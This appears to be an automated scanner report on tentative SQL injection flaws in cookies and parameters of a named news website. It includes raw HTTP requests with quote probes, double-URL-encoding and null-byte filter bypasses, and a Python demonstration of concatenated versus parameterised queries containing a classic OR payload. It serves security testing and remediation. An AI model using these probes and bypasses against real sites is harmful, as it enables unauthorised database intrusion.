<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='LONDON—Supermodel Naomi Campbell has been awarded a prize by the British Fashion Coun ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /celebrities/ci_16800030 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4%2527%2527; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/celebrities/ci_16800030?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:45:47 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:45:47 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 446
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The __g_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __g_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __g_u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /celebrities/ci_16800030 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310%2527; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='LONDON—Supermodel Naomi Campbell has been awarded a prize by the British Fashion Coun ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /celebrities/ci_16800030 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310%2527%2527; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/celebrities/ci_16800030?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:45:40 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:45:40 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 446
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /celebrities/ci_16800030 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true'; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='LONDON—Supermodel Naomi Campbell has been awarded a prize by the British Fashion Coun ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /celebrities/ci_16800030 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true''; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/celebrities/ci_16800030?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:45:37 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:45:37 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 446
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The currBrandCheck cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the currBrandCheck cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /ci_16761580 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews'; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Whether you celebrate Hanukkah, Kwanzaa or Christmas, or maybe all three, here are some gif ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]... <a href="http://www.insidebayarea.com/holdays-2009/ci_13866290" target="_blank" style="width:184px">From luxury on the cheap to can't-fail video games</a> ...[SNIP]...
Request 2
GET /ci_16761580 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews''; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/ci_16761580?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:38:32 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:38:32 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 434
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The JSESSIONID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JSESSIONID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /ci_16791927 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA%00'; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Most of lame-duck governors final budget fix would extend into next fiscal year'><meta ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]...
Request 2
GET /ci_16791927 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA%00''; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/ci_16791927?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:45:21 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:45:21 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 434
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The UserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the UserID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /ci_16791927?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%2527; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Most of lame-duck governors final budget fix would extend into next fiscal year'><meta ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]...
Request 2
GET /ci_16791927?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%2527%2527; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/ci_16791927?source=m ...[SNIP]...
The __g_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __g_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /ci_16791927?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310'; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Most of lame-duck governors final budget fix would extend into next fiscal year'><meta ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]...
Request 2
GET /ci_16791927?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310''; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/ci_16791927?source=m ...[SNIP]...
1.189. http://www.mercurynews.com/ci_16791927 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.mercurynews.com
Path: /ci_16791927
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /ci_16791927?source=most_viewed&1%00'=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Most of lame-duck governors final budget fix would extend into next fiscal year'><meta ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]...
Request 2
GET /ci_16791927?source=most_viewed&1%00''=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/ci_16791927?source=m ...[SNIP]...
The source parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the source parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Note that the response excerpts captured for the findings in this section are truncated and none of them shows database error text: in most pairs the only visible difference is a 200 HTML page for the single-quote request against a 302 redirect for the two-quote request, and in some pairs (including the one directly below) the two excerpts are indistinguishable. Until the full responses have been examined, or the behaviour has been reproduced with a boolean- or time-based probe, treat each of these as tentative.
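Why the scanner's one-quote/two-quote test separates string concatenation from a bound parameter, as an added Python example against an in-memory SQLite table with constructed rows (this is not code or data from the scanned application, whose query text is unknown; SQLite follows the standard SQL rule that '' inside a literal is an escaped quote, so the behaviour carries over to other engines): with the parameter spliced into the SQL, a single quote leaves the string literal unterminated and the database rejects the statement, while two quotes form an escaped quote inside the literal and the statement runs; with a parameterised query both inputs are plain data and neither one errors.

```python
import sqlite3


def make_db():
    # Constructed sample data standing in for an article/source lookup;
    # the values are illustrative, not taken from the scanned site.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER, source TEXT)")
    conn.executemany(
        "INSERT INTO articles VALUES (?, ?)",
        [(16791927, "most_viewed"), (16794599, "most_emailed")],
    )
    return conn


def lookup_concat(conn, source):
    # Vulnerable pattern: the parameter is spliced into the SQL text, so a
    # quote in the input changes the structure of the statement.
    sql = "SELECT id FROM articles WHERE source = '" + source + "' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def lookup_param(conn, source):
    # Parameterised: the structure is fixed first and the value bound second,
    # so a quote in the input is data and nothing else.
    sql = "SELECT id FROM articles WHERE source = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (source,))]


def probe(lookup, source):
    # Mirrors the scanner's check: does this input make the statement fail?
    # Returns the matched ids, or an "error: ..." string when the database
    # rejects the statement (the "general error message" the report refers to).
    conn = make_db()
    try:
        return lookup(conn, source)
    except sqlite3.Error as exc:
        return "error: " + str(exc)
    finally:
        conn.close()


if __name__ == "__main__":
    payloads = ("most_emailed", "most_emailed'", "most_emailed''", "x' OR 'a'='a")
    for name, fn in (("concat", lookup_concat), ("param", lookup_param)):
        for payload in payloads:
            print(name, repr(payload), probe(fn, payload))
```

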